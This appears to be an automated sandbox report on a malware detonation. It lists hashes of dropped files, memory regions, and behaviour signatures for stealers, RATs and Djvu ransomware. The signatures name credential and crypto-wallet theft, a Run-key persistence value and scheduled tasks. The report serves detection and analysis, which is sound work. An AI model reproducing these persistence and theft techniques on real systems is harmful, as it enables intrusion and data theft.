MD5 4404c55ec80e94d9667fc99d1ac260d0
SHA1 c2d926a7a667e85382c1b557114b75c60dcf4dc6
SHA256 8293f4bee7196717755e29f6631c00574adcdaf994966ddb02a85e80aab0770d
SHA512 ec416b56cfd1e67e9d2e40a10ec05071ab9ad13731568ef004dcba3ec7bc0fb0452804e7b1f5f0497760f737a63a2d90e6216654f62e89d335f3acb731228a26

memory/2584-216-0x0000000000FC0000-0x0000000001CA5000-memory.dmp

memory/2584-230-0x0000000000140000-0x0000000000141000-memory.dmp

\Users\Admin\AppData\Local\Temp\8410.exe

MD5 8d2c6189a11b8cfa16842a17277a1555
SHA1 c1d74923042bf72a4c137427cf45904181a45454
SHA256 25d63431a3cf6596694bd494bad0a1e632f0bc8a1e2e545351c4a8004d88f007
SHA512 230f43a883799fc564e23989ce9e0d05b8ea985e90eadea84d2e58ce3486c5d7481e0bf555bf1176665e349dd9b67529444780f4bbfb53d138759310cab1041b

memory/2584-255-0x00000000009C0000-0x00000000009C1000-memory.dmp

memory/2584-254-0x0000000000FC0000-0x0000000001CA5000-memory.dmp

\Users\Admin\AppData\Local\Temp\8410.exe

MD5 a90326038e2962823462150d63ff1f0d
SHA1 b2494f3015dfaa1c4456a932d2512e0b2b77d37c
SHA256 0c42a85f289c78052fb33baf5bae3605fdcdf71fcc9502d483c5505879c6096e
SHA512 57034ed505d87bee855329436ff36d23222fcbbfdfc1c5c02fcb054871ec3f1c9651f0222c076901a3f8e8c138b8cede36b94a1e5b5ec0500204e5ede19ee634

\Users\Admin\AppData\Local\Temp\8410.exe

MD5 f2b5b16453d7f5b1e82a92e8f09f35e5
SHA1 bdc97742e683fb5a89c55245eebd924c3c090674
SHA256 286075aba343ce1c880d084a73d5ce174dd4eb53188af218aa8b4b6d461df339
SHA512 5d0bc07aa8ce7ae7a69ea214a4323264ba415c9fcf21a8b9c265c1a47f98f4c0a25e98b9dccc82dbd50cc871ab684dab380d1c330733e557951747f9b7aa6136

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

MD5 4b2610479dfd5a7aa1582d76b712e84b
SHA1 43751f499df4e72c67450ccbdfb542130cceb709
SHA256 ef485836ccc0e06ead9ddf0bf9df03494600761cb2f181d84944824272301fd0
SHA512 d8fee9d6de05e87759b58be074f2bf01a3130f0a18e8fcb20e3cda404cac2671a2227f446c1211d075486c7e064df0db9e283a097c89c678a288996180ce112d

memory/2708-263-0x0000000000940000-0x0000000000A40000-memory.dmp

memory/2584-228-0x0000000000140000-0x0000000000141000-memory.dmp

memory/2584-226-0x0000000000140000-0x0000000000141000-memory.dmp

memory/2584-225-0x0000000000080000-0x0000000000081000-memory.dmp

memory/2584-223-0x0000000000080000-0x0000000000081000-memory.dmp

memory/2584-221-0x0000000000080000-0x0000000000081000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BE25.exe

MD5 0ce50eaaeccf509f400fd2d8ca26990d
SHA1 f390e6aa7a9052c0889d81da71de8e41cbdbcc0b
SHA256 a31560f54a5c8ad5dfcadec5c1c7b9c2d94db474a28c8a24f873e663ada8362e
SHA512 8b00389817b576affa342c2ad0aca7c9d3c04df95f6f40520a7ae145d21aa8a6b940bd155c6da39f6d2e3e5d42ffdde71e00dd1a792fe7549ba9c06a989d2543

\Users\Admin\AppData\Local\Temp\BE25.exe

MD5 ac3e7ec616235bbd36d1c4a9ace14560
SHA1 6c119d810a8b63a364c49a5d03d2315b27b07efc
SHA256 9a5e5d9fb693579c9bf43285fa0ad661bdfa2109cabe84babccea14d9e94fc5f
SHA512 f060ee8631eb1f584d01d9bd54f898e3c325882d65ef5451f7db016bbf240c1346a1a46681021d8ff1437808c97597720db85fb358be394deae1c925c53a6f07

memory/2584-283-0x0000000000FC0000-0x0000000001CA5000-memory.dmp

memory/2708-287-0x0000000000940000-0x0000000000A40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2C15.exe

MD5 73dd1ad39b4674736d4024b9a9af5a91
SHA1 9f117817db7296dc3b62c9c7531f55f7d520a6f3
SHA256 6db60e40c06306984110f5b1fda1c00094a9d4c64a41280c09f811aa81159690
SHA512 91a69b0e40ef7702af49919487cc0c6b41afb1b4b9d2f1558662b266b07fb153582b42f3f562fad035eeacb6d2bf9107a08a9011fe58de2ca7bf59e9be162d36

C:\Users\Admin\AppData\Local\Temp\2C15.exe

MD5 1f771a4090c93406778128c2cef63e86
SHA1 1134930d91881812d2e028332e23ed35a09a39da
SHA256 2040f8cf3506e2e7c964ac477febc542dfc935577c37eafce931ebdb12c85e78
SHA512 443767ac465ab94d4a1907519823eb2f628b607c91810d9a20740d65527af06879bb0b2bae024f064e57a105b1d7fed85d28c2c002753847743fce1759cea31c

memory/956-300-0x00000000000A0000-0x0000000000542000-memory.dmp

memory/956-312-0x00000000020F0000-0x00000000020F1000-memory.dmp

memory/956-313-0x0000000002190000-0x0000000002191000-memory.dmp

memory/956-311-0x00000000026C0000-0x00000000026C1000-memory.dmp

memory/956-310-0x0000000002350000-0x0000000002351000-memory.dmp

memory/956-309-0x00000000022F0000-0x00000000022F1000-memory.dmp

memory/956-308-0x0000000002180000-0x0000000002181000-memory.dmp

memory/956-307-0x00000000007E0000-0x00000000007E1000-memory.dmp

memory/956-306-0x0000000002810000-0x0000000002811000-memory.dmp

memory/956-305-0x0000000002340000-0x0000000002341000-memory.dmp

memory/956-304-0x00000000025D0000-0x00000000025D1000-memory.dmp

memory/956-303-0x0000000002570000-0x0000000002571000-memory.dmp

memory/956-302-0x00000000000A0000-0x0000000000542000-memory.dmp

memory/956-301-0x0000000076FB0000-0x0000000076FB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31C0.exe

MD5 bbd27e1b962190bbe8849de42149e8c1
SHA1 4ae74ff009d786abe56815f4fd089c0bf2ad923a
SHA256 e983cd66c6309610e5b7e7d668039323967c9a7441cb152e61bc2f20db508f15
SHA512 cd7d86d9765dc65556aecafd8a116d9b40bf563955091a5e30950f856e570b387a7ed27a5afc8f5785d4235347c6996fff484ce0209545104fb03f2d125e7464

C:\Users\Admin\AppData\Local\Temp\31C0.exe

MD5 d5ab9550784d1bf26ab0420b1d9ca51f
SHA1 b1c7311fdca0498673f8133b96b710c4d36d846e
SHA256 3904bbc346622b40fe8f63c6541cf976f22ccaef980b2f971fbbecfb4cefe678
SHA512 c028dce36516e23bbcc1d8aec65c28ba1cb43689b1f277e6f86ba12391fe11484809d6e9b2db77587f413b1732da239fec2d188563b3512c0baeecae254a3948

memory/956-321-0x00000000022E0000-0x00000000022E1000-memory.dmp

memory/956-322-0x0000000002870000-0x0000000002871000-memory.dmp

memory/956-323-0x0000000002820000-0x0000000002821000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2C15.exe

MD5 9262b7eac1014aab9d4cea11b3217cc4
SHA1 3c8c7be8f03fb6ce0e244a324b490a513d2157aa
SHA256 110c427fc5905a6aede313a0606128865744502934aec6942cd47dcf4accb7f9
SHA512 056a2694faf3b2ab450f867f6f513f14278cca9493d802ae1121bbb0e9440394efbb35580a2034d39d782e57d89b7b5f22f2ad4961a6481c7ba0408ef3cab50d

memory/956-329-0x0000000002B00000-0x0000000002B01000-memory.dmp

memory/956-332-0x00000000000A0000-0x0000000000542000-memory.dmp

memory/956-331-0x0000000002560000-0x0000000002561000-memory.dmp

memory/956-324-0x00000000007F0000-0x00000000007F1000-memory.dmp

memory/2040-336-0x0000000000400000-0x00000000004AB000-memory.dmp

memory/2040-335-0x0000000000220000-0x000000000028F000-memory.dmp

memory/2040-334-0x0000000000590000-0x0000000000690000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3BCF.exe

MD5 f727c0754ddda4ed6354375ab748735b
SHA1 2ad7d52a12f896817edfe511ec26212580dc5958
SHA256 661a2b6049a9d139ab8ae094b25ea0cfd3f24e7aa18190ae11e23f9e97753899
SHA512 1193780f969653123b41f41f9f6aeb1b71752d80337fd01928dfcee4e370b49fc24da0bfab6bcfb710019301bea3800db90250b46bfae4a45e2ad6a6d73a5ce3

memory/1540-343-0x0000000072880000-0x0000000072F6E000-memory.dmp

memory/1540-342-0x0000000000180000-0x000000000021A000-memory.dmp

\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

MD5 45b7c3de508bccbf27e3dc658c52290f
SHA1 29d45efb52ca25eea4371764443ab323b3aa8b90
SHA256 06a54cdd36bf0c244d02ae7c20886cfe545fc5df8aa6a353b4bb49e6044a76a0
SHA512 afcd601fe8aa43760122e2463b7366541504d1e2438726e1d4444b6f9fa323f82eb81f09e6d66cd446fe6a557b45085f827cd2453de455424ef625e44f8f6d14

C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

MD5 0de19cd17462ea79db1a5e5fd1d7f59f
SHA1 d2b313dcfbda9a04475fc01182336b52846bbe3b
SHA256 c7a85c09379538ca0f5e856eb5dcf63d949c9d1841e12cb8c5fd42c780f1fe3b
SHA512 0aecaaa2d8488c3150b2349c260782c13619c5b871f7559496da8fa53e8a18a3fff39603d65516f53709c95108672fd08da8a1249b58aaba92c19ad80411d40c

memory/2040-361-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2040-362-0x0000000000400000-0x00000000004AB000-memory.dmp

memory/1540-354-0x0000000005080000-0x00000000050C0000-memory.dmp

\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

MD5 c9a6c6fcf7d7d38f9ff025275620fb90
SHA1 74e7187e32f50016390a89097396cdbe7459de72
SHA256 e4464b0edf5f5e87b3772e6bf61bcdfc363c7398acf643f785ba9ee4949d8ffb
SHA512 63576b85f4843a346a2a253ff4a1ef0b81341a05935167973e02fb5765f5b32789fdfe5076565866328031acbdf61ede45d4bc24ddf4e837c7e046f4293a0855

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FIFYCI9A8YUT80ZM1MS6.temp

MD5 76097c54fb11372f9d34d446d4cb9fe7
SHA1 a048ac1b087c29a15be166ad888047af16b8c07a
SHA256 1cbe5691eb7621a93e37e9d473f274d63cb0922243f755817b909d4ea78904de
SHA512 b2994fef29b4cd3d26efed28fe4fbd2b2b884b8e619a4bb4132fc1ed2acae26161d6ebe0cc3dd33ad532faf81103862e997e98cf8600d9f4579fae2facd127b2

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2100-371-0x000000006EDA0000-0x000000006F34B000-memory.dmp

memory/2040-346-0x0000000000570000-0x0000000000571000-memory.dmp

memory/2952-373-0x000000006EDA0000-0x000000006F34B000-memory.dmp

memory/2952-374-0x0000000002770000-0x00000000027B0000-memory.dmp

memory/2100-375-0x0000000002730000-0x0000000002770000-memory.dmp

memory/2952-376-0x000000006EDA0000-0x000000006F34B000-memory.dmp

memory/2100-378-0x0000000002730000-0x0000000002770000-memory.dmp

memory/2100-379-0x0000000002730000-0x0000000002770000-memory.dmp

memory/2100-377-0x000000006EDA0000-0x000000006F34B000-memory.dmp

memory/2952-380-0x0000000002770000-0x00000000027B0000-memory.dmp

memory/2952-381-0x0000000002770000-0x00000000027B0000-memory.dmp

memory/2100-383-0x000000006EDA0000-0x000000006F34B000-memory.dmp

memory/2952-382-0x000000006EDA0000-0x000000006F34B000-memory.dmp

memory/1100-386-0x0000000000400000-0x00000000004AB000-memory.dmp

memory/1100-385-0x0000000000570000-0x0000000000670000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 93ce2fd9b704b9f5cb02c3d9db8dc8c8
SHA1 b9e223acdc08d3fd59e0899f2c7dfe3119d9decb
SHA256 dbfd4395f2d616922e3c0003f1d16815cf4b23349ae36222aeff63e884c518b7
SHA512 1867ecf1da50adba7a2718fdc6997114688943096b6fa21c96e5cc5e440acfead98f593fd322e13db7b6d628f343500df80bdc3d782979c94170aafc9d100644

C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 e5b83dfe8ffb9ddf677ae3221581d00a
SHA1 d82899d94e0d9eca7ac0a6b53bc311aa6458b9e5
SHA256 df9d57daad9e02541a7e21af4d39428910a96570471bb0e68d7f52be0d5b017a
SHA512 07e6ec75b5e84defbdd0ddda7ecbfa184c1491867d0b3ebd06fbe1b75fc1d40ec80a04cd41e5330ed781f1fab0091e8d7ff7ec631bd87df814b8f20e79f7df7b

C:\Users\Admin\AppData\Local\Temp\452737119395

MD5 d3cbc6fa47d52868cdfcd66ae87c213b
SHA1 9a6338010aabbeb94008dc817a768434f58833a9
SHA256 8d252f852e3d7e6cb20c199fba553cdc10e76a222ba66c7e3052258536d78bf3
SHA512 f2eaf5068baabb9dfa1a59d3713183e9a145263bd270c499477f333aa5c3d1bc36067ce2a5b547bfb0407e782e2fe7c3fd95d48f38b6c869a42ca303f990ab86

\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 8f13410c0a7e08cbe20d4437025ace23
SHA1 340c7cf06515d5210241de4d831e47786257aefc
SHA256 55ab14dd23f2be00ef8964e7972c5e8452c5a5e7426e7fe22f83b408ea80b1b3
SHA512 f330782ef1b47704cc932fd444d0de9109eac7118b845aa3eddb85cef50f5ebe0fabd562d3f46201f9b2c51c71fdd2bfe038b8ab43e255322f45a8b873c716e7

\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 00d05fec148cc541b7909edc001a5052
SHA1 0bdeaa4eea758d3d07e78286bc10d88e439cbf0e
SHA256 9c9dbcf86e7c007389e51390010a732c50545ff4afad8431ff644bf6c2680560
SHA512 35eeaea9d6fde52a57a91b3ea56257c05f8bb7433340fbb5cd138d85a42a3dc9d81cdf53286d1765b8ae83c9a64afad9ffb67707fff946bf6d567b826322d86b

\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 6abbbdfe613dfd85ab61d92a740eac30
SHA1 c257d8e463944cea3889711268548c4e8f06ec30
SHA256 27c13ee9cabe9110c7bdf2e9d309bc6af452167fb91adbb1c50242e8edfd0c3e
SHA512 312541ccd892ff4c5c1b902775728de0bc73335f8a7403a273a55e605aaebd3cbdc5dc25298daa70e1324618c6cbe89a0e243d6f9af502739b2b095b1859c967

\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 ebc36f61b14556db42e89c3117d992a4
SHA1 eef2cb9d3d5ea206337c963ee9761505c8fa59b4
SHA256 94c51d53c7230f05c3d4897ac51f5c470f80459b353a8b7d80d741a46444b585
SHA512 5bb65a928e627c1fb02f59e363ce429856e3ff5861ff882c2a98458d5ca46c986930f5ef5b2b2e6945d5807362df8e9be0daafba499be6672c79f5be3091773a

\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

MD5 177c56527c4940875b2d8e5b3e85ccb5
SHA1 88faa0698ec92eeb2b8e95912cd6388576029d36
SHA256 71b5b527a3c40dba6edd886afba94aefd705c84ca52a23a2a745ee13ea302f9c
SHA512 6a2452621938126e35394e12e66bea798cd8fa99bd0b07dff04a720b1a1cd7436bdfdb4b1726f2456ec4576ef147b8434e858a1e5c6a167fe99624057af541d8

C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 6c5bd9f974a80bfe17fe7797da102c94
SHA1 51b0f76e949a607fe9e41997183417ad81e3a6e6
SHA256 8d813e5be9e13cb4f579a6485aaa586c358b420d28533f13b9be89352b1b7bff
SHA512 f4e8e71a9f298bf2f47dc7ceca10215ea48b560397fc7deb217d51e799a28c4648b710fb13419526d7d6a22a30d7168729f37a58253659edfd5cd4e421bae507

\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 eb07f6871ab2b76e783be67d82705d38
SHA1 fa890da45099be2f4887d1824c78bba60cf80878
SHA256 5c10409945e770bf0cf504c398b04e2730275ca85e0c688a74cd3345bf38d007
SHA512 92e24b8bbefada8772af83cef78b1f32cce0a2e875dfdb8681ef2548969ed030ac5729ba71a17610defe7607c59de54d26cc7dc7126d4e1bd8c1796829d75be2

\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 88889e383d73b901b559f662d5b7f8eb
SHA1 07694eea3c59b665095b5987cd8d88d88207fa02
SHA256 066e4a9bf2a0ffb2f567c1735692286f8ae9537f3487c2c1467f2ad7cb41f7aa
SHA512 2cac3ebdcb2e45ec760d47f0ed7fa4b641dca617dd7ceb9a9be0eeae5060556eb294e1aa1325e5d989869eea5360a6b7835e597d44812f9dcf079d1c7850868c

\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 5f0905646c7a71286813d48ffef36862
SHA1 af2554826138ab581797f52567e8ad8d270f873e
SHA256 ed18f280fc00d91b509597ef8092ce72ecccf4fe4908406ea29a72ba63850180
SHA512 0ea4c8475d1a9df32176af642d974a9d95ea081ad776936b2722489aba73c64737191d4d81991c5befc48f1c324d93dfc4f5f38ef1eccbd335bfae8c2f2d0f59

C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 4ca3e9ec88dd8a49e37e8ac89bf037ac
SHA1 049666797a01e7d04400b280c1d6d6b0a0c6d4d0
SHA256 91c3ac68ba013aad7fcb77da825c93ff078b0cf980c792c244264e0de453ee5d
SHA512 3fe35745f793c112431e22abe070eb2e7bf9701f1f41c12537f690443b4327b66367e9e51f4a6b5fbffacf6ffe740a8649c96bcb56cd98a512210a7d899595f7

C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll

MD5 ca684dc5ebed4381701a39f1cc3a0fb2
SHA1 8c4a375aa583bd1c705597a7f45fd18934276770
SHA256 b8c5ad09c5b62fa8d8bcb8e1c317700274b4756d04fc964ccae38103c318ddd2
SHA512 8b414799e37d50f664e04e704ab06a8f6f25cb9f9c24f157e998a72aad9c0a0cd9435b42c629dc26643f039725d22a89ca3468dc39009d11d910420a80e9c510

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-15 01:05

Reported

2024-03-15 01:10

Platform

win10-20240221-en

Max time kernel

300s

Max time network

301s

Command Line

C:\Windows\Explorer.EXE

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-682446400-748730298-2471801445-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ea10023c-c3fb-47cc-92b7-f6d1ae94c05a\\FD24.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\FD24.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Lumma Stealer

stealer lumma

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2792 created 3820 N/A C:\Users\Admin\AppData\Local\Temp\25500\Http.pif C:\Windows\Explorer.EXE
PID 2792 created 3820 N/A C:\Users\Admin\AppData\Local\Temp\25500\Http.pif C:\Windows\Explorer.EXE
PID 2792 created 3820 N/A C:\Users\Admin\AppData\Local\Temp\25500\Http.pif C:\Windows\Explorer.EXE

Vidar

stealer vidar

ZGRat

rat zgrat

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url C:\Windows\SYSTEM32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url C:\Windows\SYSTEM32\cmd.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-682446400-748730298-2471801445-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ea10023c-c3fb-47cc-92b7-f6d1ae94c05a\\FD24.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\FD24.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\bbtsjjr N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\bbtsjjr N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\bbtsjjr N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-682446400-748730298-2471801445-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance C:\Windows\Explorer.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
